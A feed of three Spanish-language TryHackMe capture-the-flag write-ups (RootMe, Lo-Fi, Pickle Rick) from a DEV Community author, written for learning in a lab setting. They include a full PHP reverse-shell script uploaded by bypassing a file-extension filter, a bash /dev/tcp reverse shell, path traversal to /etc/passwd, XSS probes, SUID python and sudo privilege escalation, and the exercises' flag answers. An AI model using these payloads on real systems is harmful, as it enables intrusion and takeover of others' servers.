DEV Community: C4rnotaurus

RootMe | TryHackMe | Spanish

C4rnotaurus — Fri, 18 Apr 2025 04:50:10 +0000

Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo].

Con esta información respondemos las preguntas de la Task 2, que sería: 2 puertos abiertos, versión de Apache 2.4.29 y SSH corriendo en el puerto 22. En la última respuesta que se ve en la imagen solo hay que hacer click en completado, ya que nos dice que hagamos un escaneo de directorios con gobuster, pero en mi caso lo hice con Ffuf.

Para la última pregunta debemos hacer fuzzing, ya que nos pregunta sobre cuál es el directorio visible, para lo cual use Ffuf ffuf -u [IP objetivo] -w [Ruta_diccionario], el cual nos da los siguientes directorios.

Los directorios importantes son /uploads, que lo usaremos más adelante, y /panel, siendo este último el que nos interesa ahora para realizar la task 3 y también la última respuesta de la task 2.

Observamos que la task 3 nos dice que debemos subir un archivo para obtener una reverse shell, para lo cual usaremos una Shell reversa php.

Crearemos un archivo.

nano reverse.php5

Usamos la extensión .php5, ya que si lo subimos con .php nos dirá que no aceptan ese tipo de archivos y por ende haremos bypass colocando un 5 al final de la extensión. Luego pondremos el siguiente código dentro de nuestro archivo recién creado.

PD: Recuerden que host es el de la VPN, o sea, colocamos la IP de tun0.

<?php
set_time_limit(0);
ignore_user_abort(true);

$host = "127.0.0.1"; // Cambia por la IP del servidor listener
$port = 4444; // Cambia por el puerto del servidor listener
$shell = "/bin/bash"; // Usa bash para mejor interactividad

// Intenta conectar al listener
$socket = fsockopen($host, $port, $errno, $errstr, 30);
if (!$socket) {
    die("$errstr ($errno)\n");
}

// Configura descriptores para un entorno interactivo
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin
    1 => array("pipe", "w"), // stdout
    2 => array("pipe", "w")  // stderr
);

// Inicia el proceso con bash en modo interactivo
$process = proc_open("$shell -i", $descriptorspec, $pipes);
if (!is_resource($process)) {
    die("No se pudo iniciar el proceso\n");
}

// Configura los pipes como no bloqueantes
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($socket, 0);

while (true) {
    // Lee desde el socket (comandos del atacante)
    if ($input = fread($socket, 512)) {
        fwrite($pipes[0], $input);
        fflush($pipes[0]);
    }

    // Lee la salida del proceso (stdout)
    while ($output = fgets($pipes[1])) {
        fwrite($socket, $output);
        fflush($socket);
    }

    // Lee los errores del proceso (stderr)
    while ($error = fgets($pipes[2])) {
        fwrite($socket, $error);
        fflush($socket);
    }

    // Verifica si el proceso o el socket están cerrados
    if (feof($socket) || !is_resource($process)) {
        break;
    }

    // Evita consumo excesivo de CPU
    usleep(10000);
}

// Limpieza
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
fclose($socket);
proc_close($process);
?>

Una vez creado, nos vamos al panel a subir el archivo.

Nos ponemos a escuchar en el puerto que hemos configurado anteriormente en el código php.

Y ahora es cuando nos sirve el segundo directorio que he mencionado anteriormente /uploads, aquí está el archivo el cual subimos.

Debemos darle click para que empiece a funcionar nuestra Shell reversa. Hacemos un id para comprobar.

Posteriormente, hacemos un find / -name user.txt para buscar el archivo que nos solicitaron en la pregunta, encontramos su ubicación y lo abrimos con un cat, así dándonos la flag.

En la task 4 nos dice que debemos escalar privilegios, en la primera pregunta, nos da una pista de un comando que usaremos para ver los permisos SUID del usuario root find / -user root -perm /4000.

Al usarlo, nos revela la lista de archivos del que es propietario el usuario root, teniendo el bit SUID activado -perm /4000, este nos permite ejecutar un archivo con los permisos del propietario, o sea, cualquier usuario que lo ejecute lo hará con privilegios de root. En este caso /usr/bin/python aparece en la lista, siendo este el intérprete de Python, básicamente podemos correr código con privilegios de root.

Buscamos en GTFOBins bajo el filtro de SUID.

Nos desplazamos hacia abajo hasta encontrar "python" y seleccionamos "SUID".

Y usaremos el comando que nos da para elevar privilegios python -c 'import os; os.execl("/bin/sh", "sh", "-p")'.

Lo introducimos y con un whoami confirmamos que somos root.

Finalmente, utilizamos find / -name root.txt para encontrar la ruta del archivo para, posteriormente, abrirlo con un cat y obtener la última flag.

Y así resolvemos la máquina RootMe de TryhackMe.

Lo-Fi | TryHackMe | Spanish

C4rnotaurus — Thu, 17 Apr 2025 06:32:11 +0000

Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo].

Está el puerto 80 abierto, así que abriremos el navegador para ver la página.

Vemos que tenemos un «buscador», lo primero que se me ocurre es ver si es vulnerable a XSS.

Al parecer no, tanto <script>alert(1)</script> como <img src=x onerror=alert(1)> no hacen aparecer la alerta, por lo tanto, no es vulnerable a XSS.

Navegando por la página, voy a la sección relax y podemos ver que la página se mueve con el parámetro page así que intentaremos Path traversal.

Introduzco un index.php para saber si el servidor no está bloqueando o sanitizando archivos conocidos, si falla o da un error, se podría inferir que hay restricciones (como una lista blanca de archivos permitidos) o que el parámetro page no funciona como pensábamos, esto ayuda a evitar falsos negativos al probar payloads más avanzados. Pero en este caso sí funciona.

Intentaremos /etc/passwd, pero nos suelta un aviso.

Así que utilizamos ../../../etc/passwd el cual nos revela el contenido.

PD: Esto también se puede realizar con herramientas para automatizar la búsqueda, pero en las pruebas que utilice ffuf y gobuster me dio muchos falsos-positivos, como podemos ver, utilizando un diccionario de Path traversal, en la mayoría me daba el mensaje de que no existía, así que la mejor opción es hacerlo manual en este caso.

Ahora nos toca encontrar la bandera, podríamos buscarlo en /root/flag.txt, pero dice que no existe.

Buscamos en la ruta de /home/ Pero este no nos devuelve nada.

Intentemos buscar la flag en la carpeta raíz /flag.txt.

Efectivamente, estaba aquí la flag{e4478e0eab69bd642b8238765dcb7d18}.

Y así resolvimos la máquina Lo-Fi de TryHackMe.

Pickle Rick | TryHackMe | Spanish

C4rnotaurus — Wed, 16 Apr 2025 05:09:53 +0000

Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo].

Podemos ver que hay levantado un Apache en el puerto 80, por lo cual ponemos la [IP objetiva] en el navegador y nos lleva a la siguiente página.

Al abrir el código fuente y revisarlo, nos encontramos con el siguiente Username R1ckRul3s.

Hacemos Fuzzing de la IP objetiva con gobuster dir -u [IP objetivo] -w [Ruta_diccionario] -x php,html,txt el cual nos suelta los siguientes directorios con status 200:

/index.php
/login.php
/assests
/porta.php
/robots.txt

Observamos que hay un txt así que procedemos a verlo.

Vemos que nos dice Wubbalubbadubdub, lo guardaremos para después. Luego entramos al /login.php el cual nos pide user y passwd, el user ya lo tenemos R1ckRul3s, dado en el codigo fuente, con la palabra anterior que encontramos, en robots.txt, la introducimos en el password y... En efecto, entramos.

Hay un panel que nos da cabida a introducir comandos, ¿Pero de cuáles? Primero veremos si se puede introducir scripts XSS... se intentó varios, pero no resulto, ahora veremos si los comandos de Linux son efectivos.

Tal parece que si lo son, ya que con ls nos lista el contenido. Vemos quienes somos con id.

Somos www-data y nos confirma que no tenemos ningún privilegio root.

Al introducir el comando cat nos da un mensaje de que está deshabilitado, por lo tanto, usaremos uno similar less y abriremos Sup3rS3cretPickl3Ingred.txt.

El archivo contiene mr. meeseek hair, puede ser la primera flag... Al introducirlo en la primera preguntan, en efecto, es la respuesta.

clue.txt nos dice que busquemos en los demás directorios.
robots.txt contiene la passwd que encontramos antes.

El comando ls / nos lleva al directorio raíz e intentamos abrir el archivo /root, pero nos dice que no tenemos permiso.

Vamos a hacer una Shell reverse para poder tener mejor visibilidad, buscamos Aquí vemos un bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 en Reverse Shell.

Procedemos a modificarla para que funcione con nuestra interfaz, cambiamos la [IP] que trae por la nuestra que es la de OpenVPN.

Entonces sería:
bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1' en nuestro caso, solo cambiando la [IP] y el [Puerto] para escuchar luego con nc -lnvp 1337.

Ponemos el comando bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1' en la página y... Entramos.

Entramos al directorio /home/rick y vemos que hay un archivo llamado second ingredients, lo abrimos con cat 'second ingredients' y nos da 1 jerry tear.

luego vamos a las questions a confirmar.

Para el siguiente ingrediente debemos escalar privilegios, ya que el directorio /root nos manda un aviso de permiso denegado.

Así que usamos sudo -l para inspeccionar.

Y en este caso podemos usar sudo bash para elevarnos como usuario Root, confirmamos con id.

Entramos al directorio /root.

Vemos 3rd.txt el cual abrimos con cat 3rd.txt que nos da el tercer ingrediente fleeb juice.

Lo confirmamos en las questions.

Y así completamos la máquina Pickle Rick en TryHackMe.